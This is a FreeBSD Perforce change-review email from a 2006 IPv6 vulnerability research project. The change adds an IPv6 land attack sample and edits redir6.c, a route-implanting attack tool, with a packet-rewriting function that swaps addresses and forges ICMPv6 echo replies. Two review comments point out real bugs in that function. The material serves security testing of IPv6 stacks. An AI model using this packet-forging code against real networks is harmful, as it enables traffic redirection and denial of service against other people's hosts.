Date: Sat, 1 Jul 2006 14:21:12 GMT Message-Id: <200607011421.k61ELCDD087685@repoman.freebsd.org>
From: Clément Lecigne To: Perforce Change Reviews Cc: Subject: PERFORCE change 100396 for review X-BeenThere: p4-projects@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: p4 projects tree changes List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 01 Jul 2006 14:21:13 -0000 http://perforce.freebsd.org/chv.cgi?CH=100396 Change 100396 by clem1@clem1_ipv6vulns on 2006/07/01 14:20:17 land6.c - implementation of the IPv4 land attack. KAME is not vulnerable. Some improvements around redir6.c. Affected files ... .. //depot/projects/soc2006/clem1_ipv6vulns/libnet/sample/land6.c#1 add .. //depot/projects/soc2006/clem1_ipv6vulns/libnet/sample/redir6.c#2 edit Differences ... ==== //depot/projects/soc2006/clem1_ipv6vulns/libnet/sample/redir6.c#2 (text+ko) ==== @@ -3,6 +3,7 @@ * Implementation of the route implanting attack by Vanhauser * using icmp6 echo request and redirect message. * + * Copyright (c) 2006 Clément Lecigne * Copyright (c) 1998 - 2001 Mike D. Schiffman * All rights reserved. * @@ -38,6 +39,7 @@ void redir6(char *, int , struct libnet_in6_addr, struct libnet_in6_addr, struct libnet_in6_addr, struct libnet_in6_addr, char *, char *); void usage(char *); +void inverse(char *); int main(int ac, char **av) @@ -160,7 +162,8 @@ } pkt = libnet_dump_packet(l); - + inverse(pkt + LIBNET_ETH_H); + libnet_destroy(l); usleep(TIMEWAIT); 
@@ -236,7 +239,40 @@ libnet_destroy(l); } - + +/* + * inverse src and dsp ip in ipv6 header. + * replace echo request type by echo reply type. + * renew the hop limit. + */ +void inverse(char *pkt){ + char tmp[16]; + + /* + * make sure that pkt starts with an ipv6 header. + */ + if (pkt[0] & 0xf != 6) + { + fprintf(stdout, "%s(): packet does not start with an ipv6 header\n", __func__); + exit(EXIT_FAILURE); + } + + /* restore source */ + memcpy(tmp, pkt + 8, 16); + /* erase ip6 source with ip6 dest */ + memcpy(pkt + 8, pkt + 24, 16); + /* erase ip6 dst with saved ip6 source */ + memcpy(pkt + 24, tmp, 16); + /* renew hl */ + pkt[7] = 255; + /* icmp type */ + pkt[40] = ICMP6_ECHOREPLY; + + /* + * XXX: checksum recalculation. + */ + return; +} void usage(char *prog){ fprintf(stdout, "usage: %s -a attack-ip -v victim-ip -r router-ip -d dest-ip"
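Review bot: In the redir6.c hunk at @@ -160,7 +162,8 @@, inverse(pkt + LIBNET_ETH_H) is called on the result of libnet_dump_packet(l) with no NULL check and no length, while inverse() reads and writes fixed offsets up to pkt[40]. Suggest checking pkt before use and passing the number of bytes that remain after the Ethernet header, so inverse() can reject anything shorter than 41 bytes. libnet_destroy(l) follows on the next line; it is worth confirming that pkt does not point into memory released by that call, and saying so in a comment, since the modified packet is presumably used afterwards.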
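Review bot: In inverse() (hunk @@ -236,7 +239,40 @@), the header check "if (pkt[0] & 0xf != 6)" does not test the IP version: != binds tighter than &, so the expression is pkt[0] & (0xf != 6), that is pkt[0] & 1, and the version field is the high nibble of the first byte in any case. Suggest "if ((((unsigned char)pkt[0]) >> 4) != 6)". The function also overwrites pkt[40] as an ICMPv6 type without checking that the next header byte (pkt[6]) says ICMPv6 follows directly, so a packet with extension headers would be corrupted silently. The XXX about the checksum is a functional gap rather than a cosmetic one: swapping source and destination leaves the pseudo-header sum unchanged, but changing the type byte makes the ICMPv6 checksum stale, so it has to be recomputed or incrementally adjusted before the packet is reused. Minor: the comment "restore source" describes a save, "dsp" in the function comment should be "dst", and the error message belongs on stderr.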